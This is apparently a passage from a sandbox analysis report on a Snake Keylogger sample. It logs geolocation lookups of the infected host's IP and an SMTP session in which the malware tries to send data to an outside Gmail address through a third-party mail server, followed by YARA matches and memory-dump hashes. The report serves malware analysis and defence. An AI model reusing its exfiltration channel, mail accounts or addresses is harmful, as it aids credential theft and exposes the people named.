                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28038
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql%2BKDPiQPBKyvg1PUtJSWxx%2BXjyOIk4NvbS%2FP99PmQM7Kl7vchJmCxZW03xoDTs8cm0FOZ4VG1udgXFI88INoNdTXI4AtzC7Ppu%2BIHUl2%2FY12am%2FYxuM2hwR9XaC8AvWO3XiVnwl"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242b79c946c30-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2642335&cwnd=251&unsent_bytes=0&cid=6c59b8bea0b685ca&ts=154&x=0"
                          2024-10-23 14:01:42 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.5 | 49721 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:43 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:43 UTC | 898 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:43 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28039
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4xidrKAxXi%2FrmHBiczuU6Tq7qJS1jwmHgPvfWw7Feo6fD5hlDXjkUuYRWqvq1FV%2BCUNqZVmBD%2Be2CQJaUPuKNWAZfrrsNewWIUcxxsgkpiX44Y%2FaWiMMSvaFirviU3lPtkJK%2FXei"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242c0ac9c2c9a-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2230&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1287111&cwnd=250&unsent_bytes=0&cid=699a1deac909cdc0&ts=157&x=0"
                          2024-10-23 14:01:43 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.5 | 49723 | 188.114.97.3 | 443 | 4304 | C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Timestamp | Bytes transferred | Direction | Data
                          2024-10-23 14:01:46 UTC | 87 | OUT | GET /xml/173.254.250.90 HTTP/1.1
                          Host: reallyfreegeoip.org
                          Connection: Keep-Alive
                          2024-10-23 14:01:46 UTC | 894 | IN | HTTP/1.1 200 OK
                          Date: Wed, 23 Oct 2024 14:01:46 GMT
                          Content-Type: application/xml
                          Transfer-Encoding: chunked
                          Connection: close
                          access-control-allow-origin: *
                          vary: Accept-Encoding
                          Cache-Control: max-age=86400
                          CF-Cache-Status: HIT
                          Age: 28042
                          Last-Modified: Wed, 23 Oct 2024 06:14:24 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1JUhZtJPs9zXR5bxQ5jB7unjEeuW%2F%2FqvNjC75De9E6WJ06BLRe89eVcLphsmHK54Yry5VpC9ZW%2F3qpfzpQD4yMbu9fHL1fpWrtf3Wu5b8qi8xvzMEv6vTcaRTPQZxNFtJcKuyU9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8d7242d02c556be0-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1765853&cwnd=251&unsent_bytes=0&cid=8ad2526f9201181c&ts=156&x=0"
                          2024-10-23 14:01:46 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                          Data Ascii: 167<Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                          2024-10-23 14:01:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                          Oct 23, 2024 16:01:52.697479010 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 220 cloud.salitel.com ESMTP Exim 4.94.2 Wed, 23 Oct 2024 16:01:52 +0200
                          Oct 23, 2024 16:01:52.698625088 CEST | 49741 | 587 | 192.168.2.5 | 185.14.58.143 | EHLO 928100
                          Oct 23, 2024 16:01:52.950872898 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 250-cloud.salitel.com Hello 928100 [173.254.250.90]
                          250-SIZE 52428800
                          250-8BITMIME
                          250-PIPELINING
                          250-PIPE_CONNECT
                          250-AUTH PLAIN LOGIN
                          250-STARTTLS
                          250 HELP
                          Oct 23, 2024 16:01:52.953181982 CEST | 49741 | 587 | 192.168.2.5 | 185.14.58.143 | AUTH login bW9udGVzaW5vc0BhenZjb25zdWx0aW5nLmNvbQ==
                          Oct 23, 2024 16:01:53.204345942 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                          Oct 23, 2024 16:01:53.485181093 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 535 Incorrect authentication data
                          Oct 23, 2024 16:01:53.486671925 CEST | 49741 | 587 | 192.168.2.5 | 185.14.58.143 | MAIL FROM:<montesinos@azvconsulting.com>
                          Oct 23, 2024 16:01:53.738452911 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 250 OK
                          Oct 23, 2024 16:01:53.738666058 CEST | 49741 | 587 | 192.168.2.5 | 185.14.58.143 | RCPT TO:<peacefulrobber@gmail.com>
                          Oct 23, 2024 16:01:53.991113901 CEST | 587 | 49741 | 185.14.58.143 | 192.168.2.5 | 550 relay not permitted, authentication required


                          Target ID:0
                          Start time:10:01:30
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe"
                          Imagebase:0xa10000
                          File size:655'872 bytes
                          MD5 hash:43299ECABD7A0636E5755414D6B7DC0C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Target ID:3
                          Start time:10:01:32
                          Start date:23/10/2024
                          Path:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
                          Imagebase:0x960000
                          File size:655'872 bytes
                          MD5 hash:43299ECABD7A0636E5755414D6B7DC0C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: (OH
                            • API String ID: 0-3924564084
                            • Opcode ID: 87fe3a68bdd9fcf994557c31716274fc4ce35d3ea012f46e876bd0db438e5122
                            • Instruction ID: ff4a48664c893d245ed89293256b8f54a87b66cd025ff21a635838c00723b58c
                            • Opcode Fuzzy Hash: 87fe3a68bdd9fcf994557c31716274fc4ce35d3ea012f46e876bd0db438e5122
                            • Instruction Fuzzy Hash: 80B2A634609A1D8FDBD8EF18C494BA973A2FF69304F5045B9E40DD7296CB36AD92CB00
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: [
                            • API String ID: 0-784033777
                            • Opcode ID: c83f82c14ebfc09a97193852f810c2f16062abc00622513f87bbf191473218f6
                            • Instruction ID: 0a87b3a5ad6017ef8cdcf3a151aaafb13302c5d3e47275a9014507491885a495
                            • Opcode Fuzzy Hash: c83f82c14ebfc09a97193852f810c2f16062abc00622513f87bbf191473218f6
                            • Instruction Fuzzy Hash: 4F42E83091992D8FDBA4EB58C894BA9B7B1FF68341F5041FAD00DE7295CB34A981CF40
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 91daf4f3899c9bb19e7c1bfd6430cc6e5ed0dcb4640c132ba870d39659e37549
                            • Instruction ID: d5980705c833d37b1ccbfc075a67e7f57522238fabc7ce54a080ed7724d95c26
                            • Opcode Fuzzy Hash: 91daf4f3899c9bb19e7c1bfd6430cc6e5ed0dcb4640c132ba870d39659e37549
                            • Instruction Fuzzy Hash: A6C1FA30A1861A8FDBA8DF54C490BB9B7B2FF58314F5041BDC41EA7685DB34A985CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: <L_^$_
                            • API String ID: 0-2684969648
                            • Opcode ID: 10cbdcddc44de35873ed9cf1f49676ad38ed25b305116a64f354d64066e1def6
                            • Instruction ID: a48d6f271e16e9a43736574cf25abcf442bc24c781ae7888b6a1507e19894a62
                            • Opcode Fuzzy Hash: 10cbdcddc44de35873ed9cf1f49676ad38ed25b305116a64f354d64066e1def6
                            • Instruction Fuzzy Hash: 3E412472D0D6C69FF385BB7858A91B97B90FFB1B84F1800BBC4449B0D3DA18A805C756
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: {z}
                            • API String ID: 0-1552007774
                            • Opcode ID: f8777eb1171046a2037c25117b2d00001b11640987648c86fb31ecb9b26b953c
                            • Instruction ID: 6ddc17dfbd94bc53ab253bd8e91728eae85993dd1205646c58eeb180b9d02bbb
                            • Opcode Fuzzy Hash: f8777eb1171046a2037c25117b2d00001b11640987648c86fb31ecb9b26b953c
                            • Instruction Fuzzy Hash: 3F621E30619A8D8FEBB9EF18C898BE937E1FF69750F50016AC80DDB691DB346945CB40
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: ~
                            • API String ID: 0-1707062198
                            • Opcode ID: 32dcf9819d0eccb7885898f28833537682aad254a48e6065b8477dddb329605b
                            • Instruction ID: 0ee0c5770c4feeec1f90efcc72a7704395df155c1319e040804d6c47730a93ee
                            • Opcode Fuzzy Hash: 32dcf9819d0eccb7885898f28833537682aad254a48e6065b8477dddb329605b
                            • Instruction Fuzzy Hash: 3BD1DE74A1991DCFEB94EB58C894BA9B3B1FFA9301F5041A9D00DE7295DB38AD81CF40
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID: o+
                            • API String ID: 0-251698391
                            • Opcode ID: 9a0e6c7f3e39d61a7c0405bd035d7fe29568344870636a3583bf735acea99a50
                            • Instruction ID: d54f96ce94898757c695565bee4d63695860cb7acbe9d9d0fe67e04bcb80e06c
                            • Opcode Fuzzy Hash: 9a0e6c7f3e39d61a7c0405bd035d7fe29568344870636a3583bf735acea99a50
                            • Instruction Fuzzy Hash: 28119970D0C91D9FEB98EF44D494BA8B7B1EB69B50F5001AAD04EE2291CF386984CF05
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1970d0ce52aaee7787aedcb24d78bcc2cc504fd1d10d59037d9c0ce597dd7e8a
                            • Instruction ID: ed75492032feff405bbe0384bfca2f8c3d7b3c57a63f552b5c2fe088f4a73c4f
                            • Opcode Fuzzy Hash: 1970d0ce52aaee7787aedcb24d78bcc2cc504fd1d10d59037d9c0ce597dd7e8a
                            • Instruction Fuzzy Hash: 32426D3462498E9FE769EF08C494BE473A1FB6C304F6444BCC90ECB795CA75A982CB10
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 725b11fa926df42040f581415180c0ec7523dbef21953bfefa778a082e220dbd
                            • Instruction ID: d926035f84273ea04d0d33950e4434f2f5adfc9abad8c3302120696eac933489
                            • Opcode Fuzzy Hash: 725b11fa926df42040f581415180c0ec7523dbef21953bfefa778a082e220dbd
                            • Instruction Fuzzy Hash: 0732A730609A1D8FDBD8EF18C498FA973A2FB69304F5045A9D40DDB6A5CB76AD91CF00
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4e57b200779169759f8c8b9467ec719a65b96fea6bf26b806a5a30569aa23f32
                            • Instruction ID: ec6cb065761a08c5b9e38770203433b8c14a1b7b9245ae702830ddd85c7b4784
                            • Opcode Fuzzy Hash: 4e57b200779169759f8c8b9467ec719a65b96fea6bf26b806a5a30569aa23f32
                            • Instruction Fuzzy Hash: A722C77090895D9FDFA9EB18C899BA8B7B1FB69700F1401EAD00DE3291CB35AD81CF45
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 332ba29c7897a1b7b0edf5518407c7a36eb353bd8d2c006c33d747e3c18b6234
                            • Instruction ID: 519105aea08eec4a1b78876c8fa18ccd12afd72380761203d5e2c2392df1e5da
                            • Opcode Fuzzy Hash: 332ba29c7897a1b7b0edf5518407c7a36eb353bd8d2c006c33d747e3c18b6234
                            • Instruction Fuzzy Hash: 7222DB74A1961D8FDB59DB14C890BEAB7B2FF58304F1052E9C40DE7286DB35A982CF44
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c5444801694c39836a97f6a0bd0fa398822801a39fc10525ae5e319d6c0e1bf6
                            • Instruction ID: 8b9763401d821c4f277cf03395f6da9f64258860efc67924ecbd7afd00173d4c
                            • Opcode Fuzzy Hash: c5444801694c39836a97f6a0bd0fa398822801a39fc10525ae5e319d6c0e1bf6
                            • Instruction Fuzzy Hash: D8D1957190995D9FDFA9EB18C899BA9B7B1FB68700F1041EAD00DE7291CF35A980CF41
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ba4360f8e2a43e1fbf3091ee550ecfd410c0362e9f999e08fea99badbda01fc8
                            • Instruction ID: 804e14ccb0c4f8e34aba7d73ae1b63606ef9dca4f6130e3056e6a2b26490ea68
                            • Opcode Fuzzy Hash: ba4360f8e2a43e1fbf3091ee550ecfd410c0362e9f999e08fea99badbda01fc8
                            • Instruction Fuzzy Hash: 25A1B87091995D9FDB99EB18C899BA8B7B1FB68740F5001EAD00DE3292DF35AD80CF41
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1537610e8422b48ccbf95e1d84aadf625e585822096969df6c707bae176a9e2
                            • Instruction ID: 9dc3a3dc6a2015802b93962f186a38d82ca242422008fe72023c449571cf612d
                            • Opcode Fuzzy Hash: e1537610e8422b48ccbf95e1d84aadf625e585822096969df6c707bae176a9e2
                            • Instruction Fuzzy Hash: 2A717D30D0DA5E8FDB95EBA89850AF97BB1FF65750F1440BAD00DE7292DB38A841CB44
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 535635fbe4d86be94ae3ed861366cc163ef3d969fa1b7df1298774e832d2f336
                            • Instruction ID: 5f7bbe2bb7ac105628bb6d548d0a7b03fb786f565e24e7a37e8ff6dca848b862
                            • Opcode Fuzzy Hash: 535635fbe4d86be94ae3ed861366cc163ef3d969fa1b7df1298774e832d2f336
                            • Instruction Fuzzy Hash: D6618C3190DA9E8FDB96EBA89854AF87FB1EF69710F1440BAD04DE7192DB285841C704
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3968fbadc9bb98045165153ca7c4f102a1d7879f8b7b52cbb5f2db2372a0b54
                            • Instruction ID: 7f95b6a643dfb7c03df751d23d0f38c5491b78f2a9d4ac636e0380dca00df63a
                            • Opcode Fuzzy Hash: e3968fbadc9bb98045165153ca7c4f102a1d7879f8b7b52cbb5f2db2372a0b54
                            • Instruction Fuzzy Hash: 5A512734A2465D8FDB58EF08C881BA8B3B1FF59314F5481E9C44EE3285CA34B982CF85
                            Memory Dump Source
                            • Source File: 00000000.00000002.2082227986.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff848f40000_rp8s2rxD5lpuQAG.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 949f914ec4fb36b097b11fb6d29833b85faa24f20520116ce3d248ab3e6bef24
                            • Instruction ID: d6af9f0c0ed3d0b9d25691ca23923577a1de939c38d04d8d365f1f952fc03890
